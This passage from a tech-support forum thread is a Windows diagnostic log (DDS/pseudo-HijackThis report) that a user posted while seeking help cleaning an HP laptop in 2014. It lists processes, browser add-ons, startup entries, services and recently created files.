C:\Program Files\Windows Media Player\wmpnetwk.exe
C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
C:\Windows\system32\svchost.exe -k SDRSVC
C:\Program Files\WIDCOMM\Bluetooth Software\BtStackServer.exe
C:\Program Files\WIDCOMM\Bluetooth Software\Bluetooth Headset Helper.exe
C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE
C:\Windows\sysWow64\SearchProtocolHost.exe
C:\Program Files (x86)\Yahoo!\Messenger\ymsgr_tray.exe
C:\Users\Hewlett Packard\AppData\Local\Apps\2.0\6H4TABEW.PPE\YHKT4HWK.R2D\vpno..tion_56181aa6c611862f_0002.0003_9bcc0731d8f9f012\VpnOneClick.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Windows\system32\NOTEPAD.EXE
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Users\Hewlett Packard\Desktop\HijackThis.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Windows\system32\mshta.exe
C:\Windows\system32\SearchFilterHost.exe
C:\Windows\system32\taskhost.exe
C:\Windows\system32\SearchProtocolHost.exe
C:\Windows\system32\igfxsrvc.exe
C:\Windows\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxps://www.google.co.uk/
BHO: Norton Identity Protection: {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} - C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\coieplg.dll
BHO: Norton Vulnerability Protection: {6D53EC84-6AAE-4787-AEEE-F4628F01010C} - C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\ips\ipsbho.dll
BHO: Java(tm) Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll
BHO: TrueSuite Website Log On: {8590886E-EC8C-43C1-A32C-E4C2B0B6395B} - C:\Program Files (x86)\HP SimplePass 2012\IEBHO.dll
BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
BHO: {9e28b297-11d4-4293-aa6f-558658ee66ae} - <orphaned>
BHO: Google Toolbar Helper: {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll
BHO: Skype Browser Helper: {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL
BHO: {cc28794a-99d4-4b1b-bccf-b065ce5f9feb} - <orphaned>
BHO: Java(tm) Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll
BHO: HP Network Check Helper: {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll
TB: Norton Toolbar: {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\coieplg.dll
TB: Norton Toolbar: {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\coieplg.dll
TB: Google Toolbar: {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll
uRun: [CCleaner Monitoring] "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
uRun: [Skype] "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun
uRun: [Messenger (Yahoo!)] "C:\PROGRA~2\Yahoo!\Messenger\YahooMessenger.exe" -quiet
mRun: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
mRun: [HPOSD] C:\Program Files (x86)\Hewlett-Packard\HP On Screen Display\HPOSD.exe
mRun: [HP CoolSense] C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe -byrunkey
mRun: [FLxHCIm64] "C:\Program Files\Fresco Logic\Fresco Logic USB3.0 Host Controller\amd64_host\FLxHCIm.exe"
mRun: [HP Quick Launch] C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe
mRun: [UIExec] "C:\Program Files (x86)\SMART BRO\UIExec.exe"
mRun: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
mRun: [KiesTrayAgent] C:\Program Files (x86)\Samsung\Kies\KiesTrayAgent.exe
mRun: [Buffalo RUNONCE] C:\BUFFALO\DriveNavi_HD-PUSU3-WR\%SRC_FILE1% /mode:RUNONCE1
StartupFolder: C:\Users\HEWLET~1\AppData\Roaming\MICROS~1\Windows\STARTM~1\Programs\Startup\Dropbox.lnk - C:\Users\Hewlett Packard\AppData\Roaming\Dropbox\bin\Dropbox.exe
StartupFolder: C:\PROGRA~3\MICROS~1\Windows\STARTM~1\Programs\Startup\BLUETO~1.LNK - C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe
uPolicies-Explorer: NoDriveTypeAutoRun = dword:145
uPolicies-Explorer: NoDrives = dword:0
mPolicies-Explorer: NoDrives = dword:0
mPolicies-System: ConsentPromptBehaviorAdmin = dword:5
mPolicies-System: ConsentPromptBehaviorUser = dword:3
mPolicies-System: EnableUIADesktopToggle = dword:0
mPolicies-Explorer: NoDriveTypeAutoRun = dword:145
IE: E&xport to Microsoft Excel - C:\PROGRA~2\MICROS~1\Office14\EXCEL.EXE/3000
IE: Se&nd to OneNote - C:\PROGRA~2\MICROS~1\Office14\ONBttnIE.dll/105
IE: Send image to &Bluetooth Device... - C:\Program Files\WIDCOMM\Bluetooth Software\btsendto_ie_ctx.htm
IE: Send page to &Bluetooth Device... - C:\Program Files\WIDCOMM\Bluetooth Software\btsendto_ie.htm
IE: {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - {5F7B1267-94A9-47F5-98DB-E99415F33AEC} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
IE: {25510184-5A38-4A99-B273-DCA8EEF6CD08} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\NCLauncherFromIE.exe
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
IE: {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
IE: {A95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\Program Files (x86)\Evernote\Evernote\EvernoteIE.dll/204
IE: {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Program Files\WIDCOMM\Bluetooth Software\btsendto_ie.htm
TCP: NameServer = 192.168.0.1
TCP: Interfaces\{CA672D26-BFD4-4F50-B6AA-5D51B350F8A1} : NameServer = 8.8.8.8 8.8.4.4
TCP: Interfaces\{EFFFBDB2-4A07-4709-9EBF-404EB7FAF87E} : DHCPNameServer = 114.108.193.201 114.108.195.1
TCP: Interfaces\{FCB5B3BF-A701-426A-9078-CEAF3836817F} : DHCPNameServer = 192.168.0.1
TCP: Interfaces\{FCB5B3BF-A701-426A-9078-CEAF3836817F}\0516271676F6E6D235B6977716C6B65627 : DHCPNameServer = 114.108.193.201 114.108.195.1 192.168.1.1
TCP: Interfaces\{FCB5B3BF-A701-426A-9078-CEAF3836817F}\073677F6278723 : DHCPNameServer = 175.168.30.1
TCP: Interfaces\{FCB5B3BF-A701-426A-9078-CEAF3836817F}\143747F62796160205C616A716023333 : DHCPNameServer = 208.67.220.220 208.67.222.222
TCP: Interfaces\{FCB5B3BF-A701-426A-9078-CEAF3836817F}\54175796E65647 : DHCPNameServer = 192.168.2.1
Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
Handler: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll
Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
SSODL: WebCheck - <orphaned>
LSA: Notification Packages = scecli C:\Program Files\WIDCOMM\Bluetooth Software\BtwProximityCP.dll
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\35.0.1916.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
x64-BHO: Norton Identity Protection: {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} - C:\Program Files (x86)\Norton Internet Security\Engine64\21.3.0.12\coieplg.dll
x64-BHO: TrueSuite Website Log On: {8590886E-EC8C-43C1-A32C-E4C2B0B6395B} - C:\Program Files (x86)\HP SimplePass 2012\x64\IEBHO.dll
x64-BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
x64-BHO: Google Toolbar Helper: {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll
x64-BHO: Skype add-on for Internet Explorer: {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll
x64-BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL
x64-BHO: HP Network Check Helper: {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll
x64-TB: Norton Toolbar: {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Internet Security\Engine64\21.3.0.12\coieplg.dll
x64-TB: Google Toolbar: {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll
x64-Run: [IgfxTray] C:\Windows\System32\igfxtray.exe
x64-Run: [HotKeysCmds] C:\Windows\System32\hkcmd.exe
x64-Run: [Persistence] C:\Windows\System32\igfxpers.exe
x64-Run: [SynTPEnh] C:\Program Files (x86)\Synaptics\SynTP\SynTPEnh.exe
x64-Run: [SysTrayApp] C:\Program Files\IDT\WDM\sttray64.exe
x64-Run: [SetDefault] C:\Program Files\Hewlett-Packard\HP LaunchBox\SetDefault.exe
x64-Run: [Hightail Sync Agent] "C:\Program Files (x86)\Hightail Desktop App\Hightail.exe"
x64-RunOnce: [NCPluginUpdater] "C:\Program Files (x86)\Hewlett-Packard\HP Health Check\ActiveCheck\product_line\NCPluginUpdater.exe" Update
x64-IE: {25510184-5A38-4A99-B273-DCA8EEF6CD08} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\NCLauncherFromIE.exe
x64-IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll
x64-IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
x64-IE: {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll
x64-IE: {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Program Files\WIDCOMM\Bluetooth Software\btsendto_ie.htm
x64-Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
x64-Handler: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll
x64-Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - <orphaned>
x64-Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - <orphaned>
x64-Notify: igfxcui - igfxdev.dll
x64-SSODL: WebCheck - <orphaned>
.
============= SERVICES / DRIVERS ===============
.
R1 ccSet_MCLIENT;Norton Management Settings Manager;C:\Windows\System32\drivers\MCLIENTx64\0302020.00C\ccsetx64.sys [2013-8-22 168096]
R2 c2cautoupdatesvc;Skype Click to Call Updater;C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [2014-4-11 1390720]
R2 c2cpnrsvc;Skype Click to Call PNR Service;C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [2014-4-11 1764992]
R2 cvhsvc;Client Virtualization Handler;C:\Program Files (x86)\Common Files\microsoft shared\Virtualization Handler\CVHSVC.EXE [2013-4-22 822504]
R2 FPLService;TrueSuiteService;C:\Program Files (x86)\HP SimplePass 2012\TrueSuiteService.exe [2011-8-26 260424]
R2 HP Support Assistant Service;HP Support Assistant Service;C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe [2012-9-27 86528]
R2 HPClientSvc;HP Client Services;C:\Program Files\Hewlett-Packard\HP Client Services\HPClientServices.exe [2010-10-11 346168]
R2 HPWMISVC;HPWMISVC;C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe [2012-3-5 35200]
R2 IAStorDataMgrSvc;Intel(R) Rapid Storage Technology;C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [2012-4-6 13592]
R2 IconMan_R;IconMan_R;C:\Program Files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe [2012-4-6 2425960]
R2 irstrtsv;Intel(R) Rapid Start Technology Service;C:\Windows\SysWOW64\irstrtsv.exe [2012-4-6 184320]
R2 jhi_service;Intel(R) Identity Protection Technology Host Interface Service;C:\Program Files (x86)\Intel\Services\IPT\jhi_service.exe [2011-2-24 212944]
R2 MCLIENT;Norton Management;C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\ccsvchst.exe [2013-8-22 143928]
R2 NIS;Norton Internet Security;C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\nis.exe [2014-5-16 276376]
R2 sftlist;Application Virtualization Client;C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe [2013-6-26 523944]
R2 UI Assistant Service;UI Assistant Service;C:\Program Files (x86)\SMART BRO\AssistantServices.exe [2013-6-7 274760]
R2 UNS;Intel(R) Management and Security Application User Notification Service;C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe [2012-4-6 2656536]
R3 bcbtums;Bluetooth RAM Firmware Download USB Filter;C:\Windows\System32\drivers\bcbtums.sys [2012-4-6 133672]
R3 BHDrvx64;BHDrvx64;C:\Program Files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\BASHDefs\20140510.001\BHDrvx64.sys [2014-5-10 1530160]
R3 btwampfl;btwampfl Bluetooth filter driver;C:\Windows\System32\drivers\btwampfl.sys [2012-4-6 620584]
R3 BTWDPAN;Bluetooth Personal Area Network;C:\Windows\System32\drivers\btwdpan.sys [2012-4-6 89640]
R3 btwl2cap;Bluetooth L2CAP Service;C:\Windows\System32\drivers\btwl2cap.sys [2012-4-6 39976]
R3 ccSet_NIS;NIS Settings Manager;C:\Windows\System32\drivers\NISx64\1503000.00C\ccsetx64.sys [2014-5-16 162392]
R3 clwvd;CyberLink WebCam Virtual Driver;C:\Windows\System32\drivers\clwvd.sys [2010-7-29 31088]
R3 EraserUtilRebootDrv;EraserUtilRebootDrv;C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [2013-11-22 137648]
R3 FLxHCIc;Fresco Logic xHCI (USB3) Device Driver;C:\Windows\System32\drivers\FLxHCIc.sys [2013-6-5 249584]
R3 FLxHCIh;Fresco Logic xHCI (USB3) Hub Device Driver;C:\Windows\System32\drivers\FLxHCIh.sys [2013-6-5 77040]
R3 IDSVia64;IDSVia64;C:\Program Files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\IPSDefs\20140526.001\IDSviA64.sys [2014-5-27 525016]
R3 IntcDAud;Intel(R) Display Audio;C:\Windows\System32\drivers\IntcDAud.sys [2010-10-16 317440]
R3 irstrtdv;Intel(R) Rapid Start Technology Driver;C:\Windows\System32\drivers\irstrtdv.sys [2012-4-6 26504]
R3 RTL8167;Realtek 8167 NT Driver;C:\Windows\System32\drivers\Rt64win7.sys [2012-4-6 553576]
R3 Sftfs;Sftfs;C:\Windows\System32\drivers\Sftfslh.sys [2013-6-26 767144]
R3 Sftplay;Sftplay;C:\Windows\System32\drivers\Sftplaylh.sys [2013-6-26 273576]
R3 Sftredir;Sftredir;C:\Windows\System32\drivers\Sftredirlh.sys [2013-6-26 28840]
R3 Sftvol;Sftvol;C:\Windows\System32\drivers\Sftvollh.sys [2013-6-26 23208]
R3 sftvsa;Application Virtualization Service Agent;C:\Program Files (x86)\Microsoft Application Virtualization Client\sftvsa.exe [2013-6-26 207528]
R3 SymDS;Symantec Data Store;C:\Windows\System32\drivers\NISx64\1503000.00C\symds64.sys [2014-5-16 493656]
R3 SymEFA;Symantec Extended File Attributes;C:\Windows\System32\drivers\NISx64\1503000.00C\symefa64.sys [2014-5-16 1148120]
R3 SymIRON;Symantec Iron Driver;C:\Windows\System32\drivers\NISx64\1503000.00C\ironx64.sys [2014-5-16 264280]
R3 SymNetS;Symantec Network Security WFP Driver;C:\Windows\System32\drivers\NISx64\1503000.00C\symnets.sys [2014-5-16 593112]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2013-9-11 105144]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2013-9-11 124088]
S2 SkypeUpdate;Skype Updater;C:\Program Files (x86)\Skype\Updater\Updater.exe [2013-10-23 172192]
S3 dg_ssudbus;SAMSUNG Mobile USB Composite Device Driver (DEVGURU Ver.);C:\Windows\System32\drivers\ssudbus.sys [2014-5-25 110336]
S3 GamesAppService;GamesAppService;C:\Program Files (x86)\WildTangent Games\App\GamesAppService.exe [2010-10-13 206072]
S3 IEEtwCollectorService;Internet Explorer ETW Collector Service;C:\Windows\System32\ieetwcollector.exe [2014-4-13 111616]
S3 massfilter;Mass Storage Filter Driver;C:\Windows\System32\drivers\massfilter.sys [2013-6-7 11776]
S3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;C:\Windows\System32\drivers\rdpvideominiport.sys [2013-5-8 19456]
S3 RSPCIESTOR;Realtek PCIE CardReader Driver;C:\Windows\System32\drivers\RtsPStor.sys [2012-4-6 339048]
S3 SrvHsfHDA;SrvHsfHDA;C:\Windows\System32\drivers\VSTAZL6.SYS [2009-7-14 292864]
S3 SrvHsfV92;SrvHsfV92;C:\Windows\System32\drivers\VSTDPV6.SYS [2009-7-14 1485312]
S3 SrvHsfWinac;SrvHsfWinac;C:\Windows\System32\drivers\VSTCNXT6.SYS [2009-7-14 740864]
S3 ssudmdm;SAMSUNG Mobile USB Modem Drivers (DEVGURU Ver.);C:\Windows\System32\drivers\ssudmdm.sys [2014-5-25 206080]
S3 TsUsbFlt;TsUsbFlt;C:\Windows\System32\drivers\TsUsbFlt.sys [2014-3-27 56832]
S3 TsUsbGD;Remote Desktop Generic USB Device;C:\Windows\System32\drivers\TsUsbGD.sys [2013-5-8 30208]
S3 WatAdminSvc;Windows Activation Technologies Service;C:\Windows\System32\Wat\WatAdminSvc.exe [2013-5-8 1255736]
S3 WDC_SAM;WD SCSI Pass Thru driver;C:\Windows\System32\drivers\wdcsam64.sys [2008-5-6 14464]
S3 ZTEusbvoice;ZTE VoUSB Port;C:\Windows\System32\drivers\ZTEusbvoice.sys [2013-6-7 123264]
S4 wlcrasvc;Windows Live Mesh remote connections service;C:\Program Files\Windows Live\Mesh\wlcrasvc.exe [2010-9-23 57184]
.
=============== Created Last 30 ================
.
2014-05-27 05:05:23	--------	d-sh--w-	C:\$RECYCLE.BIN
2014-05-27 04:37:16	98816	----a-w-	C:\Windows\sed.exe
2014-05-27 04:37:16	256000	----a-w-	C:\Windows\PEV.exe
2014-05-27 04:37:16	208896	----a-w-	C:\Windows\MBR.exe
2014-05-25 10:58:34	144664	----a-w-	C:\Windows\SysWow64\secman.dll
2014-05-25 10:46:56	206080	----a-w-	C:\Windows\System32\drivers\ssudmdm.sys
2014-05-25 10:46:56	110336	----a-w-	C:\Windows\System32\drivers\ssudbus.sys
2014-05-24 22:57:35	536576	----a-w-	C:\Windows\SysWow64\sqlite3.dll
2014-05-24 22:57:13	--------	d-----w-	C:\AdwCleaner
2014-05-24 22:56:00	--------	d-----w-	C:\FRST
2014-05-24 21:46:11	--------	d-----w-	C:\NPE
2014-05-24 21:44:42	--------	d-----w-	C:\Users\Hewlett Packard\AppData\Local\NPE
2014-05-21 00:30:55	--------	d-----w-	C:\Users\Hewlett Packard\AppData\Roaming\Blue Jeans
2014-05-16 19:14:17	2724864	----a-w-	C:\Windows\SysWow64\mshtml.tlb
2014-05-16 19:14:17	2724864	----a-w-	C:\Windows\System32\mshtml.tlb
2014-05-16 01:57:58	875736	----a-w-	C:\Windows\System32\drivers\NISx64\1503000.00C\srtsp64.sys
2014-05-16 01:57:58	593112	----a-w-	C:\Windows\System32\drivers\NISx64\1503000.00C\symnets.sys
2014-05-16 01:57:58	493656	----a-r-	C:\Windows\System32\drivers\NISx64\1503000.00C\symds64.sys
2014-05-16 01:57:58	36952	----a-r-	C:\Windows\System32\drivers\NISx64\1503000.00C\srtspx64.sys
2014-05-16 01:57:58	264280	----a-r-	C:\Windows\System32\drivers\NISx64\1503000.00C\ironx64.sys
2014-05-16 01:57:58	23568	----a-r-	C:\Windows\System32\drivers\NISx64\1503000.00C\symelam.sys
2014-05-16 01:57:58	162392	----a-r-	C:\Windows\System32\drivers\NISx64\1503000.00C\ccsetx64.sys
2014-05-16 01:57:58	1148120	----a-w-	C:\Windows\System32\drivers\NISx64\1503000.00C\symefa64.sys
2014-05-16 01:57:53	--------	d-----w-	C:\Windows\System32\drivers\NISx64\1503000.00C
2014-05-07 01:22:54	--------	d-s---w-	C:\Windows\System32\CompatTel
2014-05-07 01:22:14	--------	d-----w-	C:\Users\Hewlett Packard\AppData\Roaming\DropboxMaster
2014-05-05 08:50:34	--------	d-----w-	C:\Program Files (x86)\DVRClient Plug-in
.
==================== Find3M ====================
.
2014-05-26 16:17:16	70832	----a-w-	C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
2014-05-26 16:17:16	692400	----a-w-	C:\Windows\SysWow64\FlashPlayerApp.exe
2014-05-09 06:14:03	477184	----a-w-	C:\Windows\System32\aepdu.dll
2014-05-09 06:11:23	424448	----a-w-	C:\Windows\System32\aeinv.dll
2014-04-14 18:34:10	1070232	----a-w-	C:\Windows\SysWow64\MSCOMCTL.OCX
2014-04-14 12:13:43	96168	----a-w-	C:\Windows\SysWow64\WindowsAccessBridge-32.dll
2014-04-12 02:22:05	95680	----a-w-	C:\Windows\System32\drivers\ksecdd.sys
2014-04-12 02:22:05	155072	----a-w-	C:\Windows\System32\drivers\ksecpkg.sys
2014-04-12 02:19:38	29184	----a-w-	C:\Windows\System32\sspisrv.dll
2014-04-12 02:19:38	136192	----a-w-	C:\Windows\System32\sspicli.dll
2014-04-12 02:19:37	28160	----a-w-	C:\Windows\System32\secur32.dll
2014-04-12 02:19:32	1460736	----a-w-	C:\Windows\System32\lsasrv.dll
2014-04-12 02:19:05	31232	----a-w-	C:\Windows\System32\lsass.exe
2014-04-12 02:12:06	22016	----a-w-	C:\Windows\SysWow64\secur32.dll
2014-04-12 02:10:56	96768	----a-w-	C:\Windows\SysWow64\sspicli.dll
2014-03-06 09:31:33	4096	----a-w-	C:\Windows\System32\ieetwcollectorres.dll
2014-03-06 08:59:04	66048	----a-w-	C:\Windows\System32\iesetup.dll
2014-03-06 08:57:34	548352	----a-w-	C:\Windows\System32\vbscript.dll
2014-03-06 08:57:20	48640	----a-w-	C:\Windows\System32\ieetwproxystub.dll
2014-03-06 08:29:40	139264	----a-w-	C:\Windows\System32\ieUnatt.exe
2014-03-06 08:29:14	111616	----a-w-	C:\Windows\System32\ieetwcollector.exe
2014-03-06 08:28:15	752640	----a-w-	C:\Windows\System32\jscript9diag.dll
2014-03-06 08:15:54	940032	----a-w-	C:\Windows\System32\MsSpellCheckingFacility.exe
2014-03-06 08:11:41	5784064	----a-w-	C:\Windows\System32\jscript9.dll
2014-03-06 08:02:34	61952	----a-w-	C:\Windows\SysWow64\iesetup.dll
2014-03-06 08:02:33	455168	----a-w-	C:\Windows\SysWow64\vbscript.dll
2014-03-06 08:01:01	51200	----a-w-	C:\Windows\SysWow64\ieetwproxystub.dll
2014-03-06 07:56:43	38400	----a-w-	C:\Windows\System32\JavaScriptCollectionAgent.dll
2014-03-06 07:46:36	4254720	----a-w-	C:\Windows\SysWow64\jscript9.dll
2014-03-06 07:38:13	112128	----a-w-	C:\Windows\SysWow64\ieUnatt.exe
2014-03-06 07:36:40	592896	----a-w-	C:\Windows\SysWow64\jscript9diag.dll
2014-03-06 07:13:43	32256	----a-w-	C:\Windows\SysWow64\JavaScriptCollectionAgent.dll
2014-03-06 07:11:15	2043904	----a-w-	C:\Windows\System32\inetcpl.cpl
2014-03-06 06:40:39	1967104	----a-w-	C:\Windows\SysWow64\inetcpl.cpl
2014-03-06 06:22:40	2260480	----a-w-	C:\Windows\System32\wininet.dll
2014-03-06 05:41:49	1789440	----a-w-	C:\Windows\SysWow64\wininet.dll
2014-03-04 09:47:01	5550016	----a-w-	C:\Windows\System32\ntoskrnl.exe
2014-03-04 09:44:21	362496	----a-w-	C:\Windows\System32\wow64win.dll
2014-03-04 09:44:21	243712	----a-w-	C:\Windows\System32\wow64.dll
2014-03-04 09:44:21	13312	----a-w-	C:\Windows\System32\wow64cpu.dll
2014-03-04 09:44:20	39936	----a-w-	C:\Windows\System32\wincredprovider.dll
2014-03-04 09:44:10	210944	----a-w-	C:\Windows\System32\wdigest.dll
2014-03-04 09:44:08	86528	----a-w-	C:\Windows\System32\TSpkg.dll
2014-03-04 09:44:06	340992	----a-w-	C:\Windows\System32\schannel.dll
2014-03-04 09:44:03	722944	----a-w-	C:\Windows\System32\objsel.dll
2014-03-04 09:44:03	314880	----a-w-	C:\Windows\System32\msv1_0.dll
2014-03-04 09:44:03	16384	----a-w-	C:\Windows\System32\ntvdm64.dll
2014-03-04 09:44:00	728064	----a-w-	C:\Windows\System32\kerberos.dll
2014-03-04 09:44:00	424960	----a-w-	C:\Windows\System32\KernelBase.dll
2014-03-04 09:43:56	57344	----a-w-	C:\Windows\System32\cngprovider.dll
2014-03-04 09:43:56	52736	----a-w-	C:\Windows\System32\dpapiprovider.dll
2014-03-04 09:43:56	44544	----a-w-	C:\Windows\System32\dimsroam.dll
2014-03-04 09:43:56	22016	----a-w-	C:\Windows\System32\credssp.dll
2014-03-04 09:43:55	56832	----a-w-	C:\Windows\System32\adprovider.dll
2014-03-04 09:43:55	53760	----a-w-	C:\Windows\System32\capiprovider.dll
2014-03-04 09:43:50	455168	----a-w-	C:\Windows\System32\winlogon.exe
2014-03-04 09:20:11	3969984	----a-w-	C:\Windows\SysWow64\ntkrnlpa.exe
2014-03-04 09:20:11	3914176	----a-w-	C:\Windows\SysWow64\ntoskrnl.exe
2014-03-04 09:16:54	25600	----a-w-	C:\Windows\SysWow64\setup16.exe
2014-03-04 09:16:18	5120	----a-w-	C:\Windows\SysWow64\wow32.dll
2014-03-04 09:16:18	274944	----a-w-	C:\Windows\SysWow64\KernelBase.dll
2014-03-04 08:09:30	7680	----a-w-	C:\Windows\SysWow64\instnm.exe
2014-03-04 08:09:29	2048	----a-w-	C:\Windows\SysWow64\user.exe
.
============= FINISH: 18:13:57.18 ===============


----------



## raphael100 (May 24, 2014)

.
UNLESS SPECIFICALLY INSTRUCTED, DO NOT POST THIS LOG.
IF REQUESTED, ZIP IT UP & ATTACH IT
.
